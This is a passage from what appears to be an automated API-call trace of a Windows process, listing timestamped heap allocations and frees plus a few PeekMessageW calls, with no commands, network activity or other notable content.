Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3390 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3390 [0127.833] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3390 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.836] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.836] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.837] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.837] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0127.838] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.839] 